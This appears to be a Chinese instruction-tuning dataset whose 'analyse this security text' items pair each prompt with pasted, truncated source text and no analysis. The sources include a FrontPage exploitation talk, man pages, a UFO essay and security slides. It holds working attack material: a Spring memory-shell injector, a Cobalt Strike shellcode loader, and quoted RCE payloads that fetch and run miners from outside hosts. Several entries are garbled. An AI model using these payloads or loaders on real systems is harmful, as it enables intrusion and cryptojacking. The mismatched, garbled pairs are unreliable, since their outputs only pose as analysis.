{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n_vti_fpxploitation mshannon@fpxploiter.org Frontpage: Laying the ground work What is it? Microsoft's integrated Web Site development tool. System for adding basic to advanced functionality with little or no web page experience. Integrated MS Office package Security Nightmare Who is Vermeer Technologies? In early 1995, Vermeer Technologies developed one of the first web publishing tools for simple end users, Frontpage. Following enormous success, the application was later bought out by Microsoft and integrated in the Office package. Frontpage: Decoding the system Protocol Analysis Client/Server Protocol Analysis Communication between Client and Server. Frontpage Client and Server extensions communicate over HTTP PUT requests. The Frontpage client makes requests against Author.dll, Admin.dll, and shtml.exe. Author.dll(exe) Authoring commands, uploading, downloading content, reviewing properties, adding enhancements. Admin.dll(exe) Admin commands, including adding additional users, modify user permissions, listing accounts. Shtml.exe, vti_rpc Initial access and service negotiation. The Authentication System This authentication process takes place each time a request is performed, i.e login, upload, download, change permissions, navigate folders, etc. While an ineffective use of resources, it does limit attacks based on state. _vti_inf.html _vti_inf.html This file provides configuration information and helps us determine something about the server. _vti_inf.html Cont. Using the following simple guidelines when reading the _vti_inf.html file we can better determine the operating system. _vti_inf.html files with references to .exe tools most likely reside on Unix servers. _vti_inf.html files with references to .dll tools most likely reside on Windows Servers Server extension version numbers can further help us narrow down the options. _vti_inf Version Table Using the information in _vti_inf.html, we can often correctly determine the OS version. Operating System/Version Fr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nuupick === 命令处理传送进来的文件 ## 补充说明 **uupick命令** 处理传送进来的文件 当其他主机通过UUCP将文件传送进来时可利用uupick指令取出这些文件 ### 语法 ```shell uupick [-v][-I<配置文件>][-s<主机>][-x<层级>][--help] ``` ### 选项 ```shell -I<配置文件>或--config<配置文件> 指定配置文件 -s<主机>或--system<主机> 处理由指定主机传送过来的文件 -v或--version 显示版本信息 --help 显示帮助 ``` ### 例子 处理由主机localhost传送过来的文件在命令行直接输入如下命令 ```shell uupick-s localhost ``` 该命令通常没有输出", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nscript === 记录终端会话的所有操作 ## 补充说明 **script** 用于在终端会话中记录用户的所有操作和命令的输出信息简而言之记录终端会话发生的一切信息如同一台终端录像机例如用户在输入某条命令时字符的键入和删除也都会被记录用户在终端的所有操作终端的回显等信息会被以 `raw` 格式存储在日志文件称为终端数据文件命令的时间信息会被单独以另一种结构储存为日志文件称为时间日志文件使用命令`exit`或者快捷键`Ctrl + D`停止记录 ### 语法 ```shell script(选项)(参数) ``` ### 选项 ```shell -a, --append # 对终端会话的操作信息以追加方式写入文件保留原文件内容 -c, --command command # 只运行 command 命令而不打开交互终端相当于开启 script 执行 command 再退出 script # command 可以是任意能够在终端会话执行的命令 -e, --return # 返回子进程的退出状态码 -f, --flush # 每次终端的内容发生变动立马写入日志文件 --force # 允许默认输出终端数据文件为符号链接 -o, --output-limit size # 限制终端数据文件和时间日志文件的大小当文件大小达到此限制就会退出子进程 # size 的单位可以设置为KiB(=1024)KB(=1000)MiB(1024*1024)MB(=1000*1000) # 同理还支持 GiB TiB PiB EiB ZiB YiB GB TB PB EB ZB YB -q, --quiet # 安静模式启动和退出script命令不显示任何提示 -t[file], --timing[=file] # 输出时间日志信息到标准错误(stderr)或者文件 -V, --version # 显示版本信息并退出 -h, --help # 显示帮助文本并退出 ``` ### 参数 * 终端数据文件设置存储终端数据信息的文件名称 ### 实例 ```shell script # 开启记录默认会在当前目录创建名称为 typescript 的文件来保存终端数据文件 script command.log # 开启记录在当前目录创建名称为 command.log 的文件来保存终端数据文件 script -t 2>time.file command.log # 开启记录在当前目录创建名称为 command.log 的文件来保存终端数据文件 # 在当前目录创建名称为 time.file 的文件来保存时间日志文件 ``` **以追加模式记录终端信息** ```shell zfb@localhost:~$ script -t 2>time.file -a -f command.log Script started, file is command.log zfb@localhost:~$ echo \"hello, world\" hello, world zfb@localhost:~$ echo $(date \"+%Y-%m-%d %H:%M:%S\") 2020-12-23 20:48:46 zfb@localhost:~$ echo \"Bye\" Bye zfb@localhost:~$ ls -al total 20 drwxr-xr-x 2 zfb zfb 4096 Dec 23 20:48 . drwxr-xr-x 37 zfb zfb 4096 Dec 23 20:49 .. -rw-r--r-- 1 zfb zfb 0 Dec 23 19:03 a.txt -rw-r--r-- 1 zfb zfb 12 Dec 23 19:04 b.txt -rw-r--r-- 1 zfb zfb 2744 Dec 23 20:49 command.log -rw-r--r-- 1 zfb zfb 790 Dec 23 20:49 time.file zfb@localhost:~$ exit Script done, file is command.log zfb@localhost:~$ ``` 然后用户可以查看终端数据文件使用方法如下 ```shell zfb@localhost:~$ cat command.log Script started on 2020-12-23 20:48:25+08:00 [TERM=\"xterm-256color\" TTY=\"/dev/pts/0\" COLUMNS=\"75\" LINES=\"30\"] zfb@localhost:~$ echo \"hello, world\" hello, world zfb@localhost:~$ ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CVE-OLOO-OOXVQ扩展 中午看了下这篇章https://mp.weixin.qq.com/s/S15erJhHQ4WCVfF0XxDYMg发现了点问题记 录下 选RequestMapping内存demo如下 2 测试的时候发现注可以成功但法访问executeCommand法查看报错堆栈提示参数错误没 有指定executeCommand需要的String参数但实际有传 Java 复制代码 public class SpringRequestMappingMemshell { public static String doInject(Object requestMappingHandlerMapping) { String msg = \"inject-start\"; try { Method registerHandlerMethod = requestMappingHandlerMapping.getClass().getDeclaredMethod(\"registerHandle rMethod\", Object.class, Method.class, RequestMappingInfo.class); registerHandlerMethod.setAccessible(true); Method executeCommand = SpringRequestMappingMemshell.class.getDeclaredMethod(\"executeCommand\", String.class); PathPattern pathPattern = new PathPatternParser().parse(\"/*\"); PatternsRequestCondition patternsRequestCondition = new PatternsRequestCondition(pathPattern); ParamsRequestCondition paramsRequestCondition = new ParamsRequestCondition(\"cmd\"); RequestMappingInfo requestMappingInfo = new RequestMappingInfo(\"\", patternsRequestCondition, null, paramsRequestCondition, null, null, null, null); registerHandlerMethod.invoke(requestMappingHandlerMapping, new SpringRequestMappingMemshell(), executeCommand, requestMappingInfo); msg = \"inject-success\"; }catch (Exception e){ msg = \"inject-error\"; } return msg; } public ResponseEntity executeCommand(String cmd) throws IOException { // cmd = \"calc\";\"calc\" String execResult = new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\ A\").next(); return new ResponseEntity(execResult, HttpStatus.OK); } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 3 报错在AbstractNamedValueArgumentResolver.class#updateNamedValueInfoparameter对象没 获取到参数名另外或者info.name能获取到也 查看上级调info是通过this.createNamedValueInfo返回的 4 这个法的重写法对应的类仔细观察都是各种spring的注解解析类其实到这也就明了为啥 法传参是因为我们的法没有注解法解析参数 这个其实开头就应该发现的我们要写的是 RequestMapping 内存然应该想到通过注解来 提取参数像 @RequestParam  @PathVariable 等等 这采 @RequestHeader 修改代码如下 5 注成功 Java 复制代码 public class SpringRequestMappingMemshell { public static", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Ghost Phisher categories: Wireless Attacks tags: [kali linux,wireless attacks,information gathering,ghost phisher] date: 2016-10-25 11:50:00 --- 0x00 Ghost Phisher介绍 ------------- Ghost Phisher是一个使用Python编程语言和Python Qt GUI库编写的无线和以太网安全审计和攻击程序可以伪造DNS服务器DHCP服务器HTTP服务器并且内置自动抓取和记录认证信息的功能模块这个程序可用于制作蜜罐也可用于钓鱼安全测试的相关工作 Ghost Phisher目前支持以下功能 ```plain HTTP服务器 内置RFC 1035 DNS服务器 内置RFC 2131 DHCP服务器 网页托管和凭证记录器网络钓鱼 Wifi接入点模拟器 会话劫持被动和以太网模式 ARP缓存欺骗用于MITM和DOS攻击 使用绑定的Metasploit进行渗透 使用SQlite数据库进行自动凭证日志记录 更新支持 ``` 工具来源https://code.google.com/p/ghost-phisher/ [Ghost Phisher主页][1] | [Kali Ghost Phisher Repo仓库][2] - 作者Saviour Emmanuel Ekiko - 证书GPLv3 0x01 Ghost Phisher功能 --------------- ghost-phisher - 用于网络钓鱼和渗透攻击的图形用户界面套件 <!--more--> 0x02 Ghost Phisher用法示例 ----------------- YouTube[How to create fake wifi hotspot (ghost phisher) using kali linux 2][3] ```shell root@kali:~# ghost-phisher ``` ![ghost-phisher.gif][4] [1]: https://code.google.com/p/ghost-phisher/ [2]: http://git.kali.org/gitweb/?p=packages/ghost-phisher.git;a=summary [3]: https://www.youtube.com/watch?v=QpMZXp1NryE [4]: https://www.hackfun.org/usr/uploads/2016/10/690577029.gif", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n研发运营安全白皮书 2020年 云计算开源产业联盟 OpenSource Cloud Alliance for industryOSCAR 2020年7月 版权声明 本白皮书版权属于云计算开源产业联盟并受法律保护 转载摘编或利用其它方式使用本调查报告文字或者观点的 应注明来源云计算开源产业联盟违反上述声明者本联 盟将追究其相关法律责任 前 言 近年来安全事件频发究其原因软件应用服务自身存在代码 安全漏洞被黑客利用攻击是导致安全事件发生的关键因素之一随 着信息化的发展软件应用服务正在潜移默化的改变着生活的各个方 面渗透到各个行业和领域其自身安全问题也愈发成为业界关注的 焦点传统研发运营模式之中安全介入通常是在应用系统构建完成 或功能模块搭建完成之后位置相对滞后无法完全覆盖研发阶段的 安全问题在此背景下搭建整体的研发运营安全体系强调安全左 移覆盖软件应用服务全生命周期安全构建可信理念是至关重要的 本白皮书首先对于研发运营安全进行了概述梳理了全球研发运 营安全现状随后对于信通院牵头搭建的研发运营安全体系进行了说 明归纳了研发运营安全所涉及的关键技术最后结合当前现状总 结了研发运营安全未来的发展趋势并分享了企业组织研发运营安全 优秀实践案例以供参考 参与编写单位 中国信息通信研究院华为技术有限公司深圳市腾讯计算机系 统有限公司阿里云计算有限公司浪潮云信息技术股份公司京东 云计算北京有限公司北京金山云网络技术有限公司深圳华大 生命科学研究院奇安信科技集团股份有限公司杭州默安科技有限 公司新思科技上海有限公司 主要撰稿人 吴江伟栗蔚郭雪耿涛康雪婷徐毅章可镌沈栋 郭铁涛张祖优马松松黄超伍振亮祁景昭朱勇贺进 宋文娣张娜蔡国瑜张鹏程张玉良董国伟周继玲杨国 梁肖率武薛植元 目 录 一研发运营安全概述 ................................................................................................................... 1 一研发层面安全影响深远安全左移势在必行 ........................................................... 1 二覆盖软件应用服务全生命周期的研发运营安全体系 ............................................... 4 二研发运营安全发展现状 ........................................................................................................... 5 一全球研发运营安全市场持续扩大 ............................................................................... 5 二国家及区域性国际组织统筹规划研发运营安全问题 ............................................... 7 三国际标准组织及第三方非盈利组织积极推进研发运营安全共识 ......................... 12 四企业积极探索研发运营安全实践 ............................................................................. 14 五开发模式逐步向敏捷化发展研发运营安全体系随之向敏捷化演进 ................. 19 三研发运营安全关键要素 ......................................................................................................... 21 一覆盖软件应用服务全生命周期的研发运营安全体系 ............................................. 22 二研发运营安全解决方案同步发展 ............................................................................. 31 四研发运营安全发展趋势展望 ................................................................................................. 41 附录研发运营安全优秀实践案例 ....................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2003 Avaya Inc. All rights reserved Avaya - Proprietary (Restricted) Solely for authorized persons having a need to know pursuant to Company instructions Stack Black Ops Black Hat USA 2003 New Concepts for Network Manipulation Dan Kaminsky, CISSP Copyright 2003 Avaya Inc. All rights reserved 2 Avaya - Proprietary (Restricted) Solely for authorized persons having a need to know pursuant to Company instructions History: Peace through Superior Firepower  History  Black Ops of TCP/IP @ Black Hat 2002  Were not getting new networks  so if we want new capabilities, we need to find ways of teasing desired (if unexpected) functionality from established systems.  Paketto Keiretsu, Nov. 2002  Scanrand  High Speed Network Auditor  Minewt  Userspace NAT Router  Linkcat  Simple Network Interface  Paratrace  Parasitic TCP Traceroute  Phentropy  Zalewskian Entropy Analysis  Goal is to bring new tools to the table, keeping with the primary advantage of the defender  The defender need not be stealthy. Copyright 2003 Avaya Inc. All rights reserved 3 Avaya - Proprietary (Restricted) Solely for authorized persons having a need to know pursuant to Company instructions How: Regions of Analysis  Regions of Analysis  Intersections between layers  Layers are never entirely independent -- what happens when redundant data disagrees?  Manipulation of assumptions  Systems necessarily assume certain things to be always true about their environment, because they usually are. What happens when theyre not?  The Human Factor  Somebody has to use all this stuff; someone needs to process an increasingly large amount of information. How can this information be compiled into a maximally useful form? Copyright 2003 Avaya Inc. All rights reserved 4 Avaya - Proprietary (Restricted) Solely for authorized persons having a need to know pursuant to Company instructions LAYER 2: ARP vs. IP  Is it possible to acquire a usable IP address on a network that lacks a DHCP server?  Classic approach: Sniff fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从数据视角探索安全威胁 阿里云安全工程师 / cdxy whoami 0 cdxy 数据分析 / 威胁感知 异常数据清洗 1 信息穿透模型 2 Nday感知 3 落地思考 4 目录 | Content 异常数据清洗 1 Chapter 1 威胁感知模型基础 异常基线A 异常基线B 复杂模型 异常数据清洗的价值 云环境威胁感知现状 挑战 异常数据清洗价值 百万主机 PB级数据 有限的存储计算资源 以不损失告警为前提 压缩数据量 业务场景复杂 运营资源有限 通用性准确率要求高 理解业务特征 提升告警置信度 代码类日志清洗词法分析 参数类日志清洗字符序列 /index.php?name=cdxy/ / / / / / / / /AAAA// /index.php?name=ring04h/ / / / / / / /AAAADDA/ /index.php?name=<script>alert(1)</script>/ / / /CAAAAAACAAAAACDCCCAAAAAAC/ Site: URI Path异常 URI Path: Key异常 Key: Value异常 信息穿透模型 2 Chapter 2 威胁检测产品能力对比 检测类产品待解问题 信息穿透模型 高误报 准确率99% 依赖规则安全能力依赖长期规则运营 无规则模型低运营成本 对无危害的PoC探针行为检测能力弱 探针行为预警 对未知漏洞检测能力弱 自动覆盖Nday 仅做入侵发现 发现+回溯 信息穿透模型 案例RCE  DRUPAL /?/ q=user/password/ &name[#type]=markup/ &name[#markup]=curl+-s+185.234.218.53/.d/miner1.sh+|+bash/ &name[#post_render][]=passthru// URI 主机用户 父进程 命令 sh/-c/curl/-s/185.234.218.53/.d/miner1.sh/|/bash /usr/sbin/httpd root 案例RCE  WEBLOGIC <void/class=\"java.lang.ProcessBuilder\">/////////////// <array/class=\"java.lang.String\"/length=\"3\">///////////////// <void/index=\"0\"><string>C:\\windows\\system32\\cmd.exe</string></void>/ <void/index=\"1\"><string>/c</string></void>/ <void/index=\"2\"><string>powershell.exe/-WindowStyle/Hidden/$P/=// nEW-oBJECT/sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http:// 132.148.150.15:8080/miner.exe',/'C:\\ProgramData\\miner.exe');START/C: \\ProgramData\\miner.exe</string></void>/ </array>/ <void/method=\"start\"/></void>/ </java></work:WorkContext>/ </soapenv:Header><soapenv:Body/></soapenv:Envelope>/ POST Data 案例RCE  STRUTS OGNL (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil @class)).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm))))./ (#cmd='cmd//c/netsh/firewall/set/opmode/mode=disable'). (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains ('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','- c',#cmd})).(#p=new/java.lang.ProcessBuilder(#cmds)). (#p.redirectErrorStream(true)).(#process=#p.s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Agenda TODAY'S AGENDA DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Agenda TODAY'S AGENDA Review Basic Review Basic S CREEN S CRAPER S CREEN S CRAPER THEOR THEORY DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Agenda TODAY'S AGENDA Define what Define what Constitutes a DIFFICULT CAS E DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Agenda TODAY'S AGENDA Demo some Demo some S CREEN S CRAPER S CREEN S CRAPER TRICKS  TRICKS  DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Agenda TODAY'S AGENDA Look at ideas for Look at ideas for LARGE-S CALE LARGE-S CALE DEPLOYMENT DEPLOYMENT DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Agenda TODAY'S AGENDA S hare a S hare a HEARTWARMING HEARTWARMING MOMENT MOMENT DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Agenda TODAY'S AGENDA S hare a S hare a HEARTWARMING HEARTWARMING MOMENT MOMENT Featuring CAPTCHAs! DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Goals of this Talk Gain an understanding of some unusual (useful) web scraping techniques Your not going to walk away form here with ready-made solutions The goal is to expose you to some new ideas that you can apply to your specific situation DEFCON XVII July 31-Aug 2, 2009 Las Vegas, Nevada Screen Scraper Tricks: Difficult cases mike@schrenk.com Goals of this Talk Gain an understanding of some unusual (useful) web scraping techniques Your not going to walk away form here with ready-made solutions The goal is to expose you to some new ideas that you can apply to your specif", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CVE-2022-36804bitbucket 前台RCE漏洞 Critical severity command injection vulnerability - CVE-OLOO-PTWLQ patch#N patch#O 分析N 分析O 分析猜想 补丁分析 事后诸葛亮 N为什么是%LL O为什么不能命令注只能参数注 P为什么是git archive? EXP Ref 官通告https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center- advisory-2022-08-24-1155489835.html 准备diff下8.3.0 - 8.3.1顺便熟悉下idea diff jar包的流程 https://product-downloads.atlassian.com/software/stash/downloads/atlassian-bitbucket- 8.3.0-x64.bin https://product-downloads.atlassian.com/software/stash/downloads/atlassian-bitbucket- 8.3.1-x64.bin 分析patch发现了两处可疑的点 Critical severity command injection vulnerability - CVE-2022-36804   2 found bitbucket/atlassian-bitbucket-8.3.0-x64/app/WEB-INF/lib/nuprocess-2.0. 2-atlassian-3.jar!/com/zaxxer/nuprocess/NuProcessBuilder.class the patch#1 is like: patch#1 3 新加了个法 ensureNoNullCharacters command.indexOf(0)查找command有没有 \\u0000 这个字符 如果有就直接抛异常 Commands may not contain null characters poc可加下 这个提示值 全量补丁在下   this.ensureNoNullCharacters(commands); 1 Plain Text 复制代码 private void ensureNoNullCharacters(List<String> commands) { Iterator var2 = commands.iterator(); String command; do { if (!var2.hasNext()) { return; } command = (String)var2.next(); } while(command.indexOf(0) < 0); throw new IllegalArgumentException(\"Commands may not contain null char acters\"); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Java 复制代码 4 public class NuProcessBuilder { private static final NuProcessFactory factory; private final List<String> command; private final TreeMap<String, String> environment; private Path cwd; private NuProcessHandler processListener; public NuProcessBuilder(List<String> commands, Map<String, String> env ironment) { if (commands != null && !commands.isEmpty()) { this.ensureNoNullCharacters(commands); //patch this.environment = new TreeMap(environment); this.command = new ArrayList(commands); } else { throw new IllegalArgumentException(\"List of commands may not b e null or empty\"); } } public NuProcessBuilder(List<String> commands) { if (com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 Listeners介绍 在本版本Cobalt Strike 3.12中 提供了如图 8种Listeners(监听器) ![Cobalt Strike ](./img/2.1.png) >windows/beacon_dns/reverse_dns_txt windows/beacon_dns/reverse_http windows/beacon_http/reverse_http windows/beacon_https/reverse_https windows/beacon_smb/bind_pipe windows/foreign/reverse_http windows/foreign/reverse_https windows/foreign/reverse_tcp * beacon_x 系列为Cobalt Strike 自身包括dns,http,https,smb四种方式的监听器 * foreign 系列为外部监听器 通常与MSF或者Armitage联动 值得一提是在Cobalt Strike 3.13版本增加了一个新的Listeners(windows/beacon_tcp/bind_tcp) 它支持linuxSSH会话本文不使用3.13版本具体更新内容可以观看[官网](https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/) # 0x01 创建一个服务 创建一个服务首先配置一个监听器 本文介绍http(https) ![Cobalt Strike ](./img/2.2.png) 选择 Packages>Windows Executable ![Cobalt Strike ](./img/2.3.png) 其中可以生成 EXE,DLL 32位系统或者64位但是大多数我们生成Payload来做免杀 ![Cobalt Strike ](./img/2.4.png) 上线成功 在 Event Log处 出现上线信息 一个团队当然离不开交流 当你在Event Log直接输出内容后 全团队可见 输入`/msg name xxx` 给指定用户 # 0x02 Beacon 右键目标`interact`来使用`Beacon`我们用它来执行各种命令在第一课已经讲到 `help` 获得所有命令及其简介 `help 具体命令` 来获得详细用法在Cobalt Strike中它的心跳默认是60s 这会让我们执行的命令响应很慢在下载文件面前更为明显所以我在测试时会把时间降低一点 大家可以根据实战环境来调节建议不要太快不然流量会相对明显 ![Cobalt Strike ](./img/2.5.png) 在这里我`sleep 5` 同时介绍在beacon中 如果想对目标进行命令管理 需要在前面加上shell 如`shell whoami` 非常简单 # 0x03 Payload Generator 用 Packages>Windows Executable生成的服务很容易被AV干掉所以我们一般生成shellcode 然后自己写个加载器加载 打开Packages>Payload Generator ![Cobalt Strike ](./img/2.6.png) 不得不说Cobalt Strike非常温馨给我们提供了各个语言的Payload 后期我们讲会讲到如何运用Payload来做一些简单的免杀这里我们使用 C语言来写一个简单的加载器运行我们的Payload C语言写这些确实很简单 * 用到的编译器是vc++6.0 ``` #include <windows.h> #include <stdio.h> #pragma comment(linker,\"/subsystem:\\\"windows\\\" /entry:\\\"mainCRTStartup\\\"\") unsigned char shellcode[] = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\" \"\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\" \"\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\"; void main() { ((void(*)(void))&shellcode)(); } ``` 编译记得使用Release模式而不是Debug 生成其中shellcode加载器方法来自于网络后期关于免杀将会讲到其他本文顺带将一下", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH IP 7 \"1999年5月11日\" \"Linux 手册页\" \"Linux 程序员手册\" .SH NAME (名称) ip \\- Linux IPv4 协议实现 .SH SYNOPSIS(总览) .B #include <sys/socket.h> .br .B #include <net/netinet.h> .sp .IB tcp_socket \" = socket(PF_INET, SOCK_STREAM, 0);\" .br .IB raw_socket \" = socket(PF_INET, SOCK_RAW, \" protocol \");\" .br .IB udp_socket \" = socket(PF_INET, SOCK_DGRAM, \" protocol \");\" .SH DESCRIPTION(描述) Linux 实现描述于 RFC791 和 RFC1122 中的 Internet 协议,版本4. .B ip 包括遵循 RFC1112 的第二层的多信道广播技术的实现.它也包括含包过滤器的IP路由器. .\\\" XXX:有没有人验证了2.1确实是与1812兼容的? .PP 程序员的接口与 BSD 的套接字(socket)兼容 要获得关于套接字的更多信息,参见 .BR socket (7) .PP 创建一个IP套接字是通过以 .BR \"socket(PF_INET, socket_type, protocol)\" 方式调用 .BR socket (2) 函数来实现的 有效的套接字类型socket_type有 .B SOCK_STREAM 用来打开一个 .BR tcp (7) 套接字 .B SOCK_DGRAM 用来打开一个 .BR udp (7) 套接字或者是 .B SOCK_RAW 用来打开一个 .BR raw (7) 套接字用来直接访问 IP 协议 .I protocol 指的是要接收或者发送出去的包含在 IP 头标识(header)中的 IP 协议 对于TCP套接字而言,唯一的有效 .I protocol 值是 .B 0 和 .B IPPROTO_TCP 对于UDP套接字而言,唯一的有效 .I protocol 值是 .B 0 和 .B IPPROTO_UDP. 而对于 .B SOCK_RAW 你可以指定一个在 RFC1700 中定义的有效 IANA IP 协议代码来赋值. .PP .\\\" XXX ip当前在监听中会自动绑定,但是我不能确定这是否应该列在文档中 当一个进程希望接受新的来访包或者连接时,它应该使用 .BR bind (2) 绑定一个套接字到一个本地接口地址 任意给定的本地(地址,端口)对只能绑定一个IP套接字 当调用 bind 时中声明了 .B INADDR_ANY 时,套接字将会绑定到 .I 所有 本地接口当在未绑定的套接字上调用 .BR listen (2) 或者 .BR connect (2) 时,套接字会自动绑定到一个本地地址设置为 .BR INADDR_ANY 的随机的空闲端口上 除非你设置了 .B S0_REUSEADDR 标识否则一个已绑定的 TCP 本地套接字地址在关闭后的一段时间内不可用 使用该标识的时候要小心因为它会使 TCP 变得不可靠 .SH ADDRESS FORMAT(地址格式) 一个 IP 套接字地址定义为一个 IP 接口地址和一个端口号的组合 基本 IP 协议不会提供端口号,它们通过更高层次的协议如 .BR udp (7) 和 .BR tcp (7) 来实现 对于raw套接字 .B sin_port 设置为IP协议 .PP .RS .nf .ta 4n 19n 31n struct sockaddr_in { sa_family_t sin_family; /* 地址族: AF_INET */ u_int16_t sin_port; /* 按网络字节次序的端口 */ struct in_addr sin_addr; /* internet地址 */ }; /* Internet地址. */ struct in_addr { u_int32_t s_addr; /* 按网络字节次序的地址 */ }; .ta .fi .RE .PP .I sin_family 总是设置为 .BR AF_INET . 这是必需的在 Linux 2.2 中如果该设置缺失大多数联网函数会返回 .B EINVAL .I sin_port 包含按网络字节排序的端口号端口号在1024以下的称为 .IR \"保留端口\" 只有那些有效用户标识为 0 或者 .B CAP_NET_BIND_SERVICE 有功能的进程才可以 .BR bind (2) 到这些套接字注意原始的rawIPv4协议没有这", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe core problem with authentication and how we can overcome it Jason M. Pittman  Were goin deep, son!  Deep philosophically that is  Tools, who needs em  8.75 of 10 zombies do recommend brains anyway  Modern (current) authentication  Passwords specifically  Extends to all types however  Current authentication research  The theoretical flaws  Examples  Future Authentication  One authentication to rule them all  Theoretical implementation  Examples  Possible security threats in this future  Research questions:  Why is modern authentication full of fail?  Why arent researchers addressing this?  Research purpose & goals  Develop a theoretical approach for future authentication  Authentication is ubiquitous  Authentication is integrated into modern, digital life  The Singularity may be near  Or it might not and we still need to address the core problem Authentication Today Authentication Primer  Authentication is:  Something you know  Something you have  Something you are  Something + Something  And maybe + another Something  Ask yourself, is there a (a priori) difference between all these?  Passwords are the best example  High Usage (user base)  High Penetration (most common form of authentication)  Easy to conceptualize  Keep in mind  what were going to talk about applies to ALL forms of authentication!  How long have computing systems relied on authentication, specifically passwords?  1961  MIT CTSS  1978  Morris invents crypt(3)  Two trend defining moments:  Transition from single user systems to networked operating systems  Explosion of authentication as a consequence of the Web 2.0/Digital era.  How many of us have more than 1 password?  More than 3 passwords? Hands?  More than 5 passwords? Hands?  More than 9 passwords? Hands?  SafeNet/Rainbow Technologies Survey (2003) says:  1 -2 passwords 17.7%  3-4 passwords 34.4%  5-6 passwords 18.4%  7-8 passwords 5.6%  8 or more 23.9%  Florencio & Herley (2007) demonstrated that users type a password ~8 times a day  The sa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUFOs and Government: A Historical Inquiry What a UFO is not. What a UFO ... is. The modern era of UFOs begins in the 1940s. It begins with \"foo fighters\" over Germany and Japan in 1944. Military pilots reported objects like these: Date: September 25, 1947 From: Lt. General Nathan Twining To: Commanding General of the Army Air Forces; Brig. General George Schulgen Subject: Air Materiel Command Opinion Concerning \"Flying Discs\" ... It is the opinion that: a. The phenomenon reported is something real and not visionary or fictitious. b. There are objects probably approximating the shape of a disc. Of such appreciable size as to appear to be as large as man-made aircraft. c. The reported operating characteristics such as extreme rates of climb, maneuverability, and action which must be considered evasive when sighted by friendly aircraft and radar ...\" Congressman Lyndon B. Johnson inquired about the discs and was told: \"The Army Air Force is conducting an investigation of the alleged 'flying discs.' Detailed statements of credible witnesses are being carefully reviewed.\" Which they were. The US Air Force responds with PROJECT SIGN in 1948. Three hypotheses are considered (Russian? American? Extraterrestrial?) and the first two are rejected. That hypothesis is rejected at the top and knocked back down. But UFO reports don't stop and the USAF tries again - with PROJECT GRUDGE IN 1949. Press releases will conform to the following policy: \"\"We have investigated and evaluated ________ and have found nothing of value which would change our previous estimates on this subject.\" Some become unhappy with the lack of a serious effort and forthrightness, e.g. Chief of AF Intelligence General Charles Cabell who said to Pentagon officers: \"What do I have to do to stir up action? Anyone can see that we do not have a satisfactory answer to the saucer question....I want the answer to the saucers and I want a good answer.\" June 1952. Orders are issued to fire ... on a mirage? on a halluc", "category": "text_analysis", "source": "security_papers"}
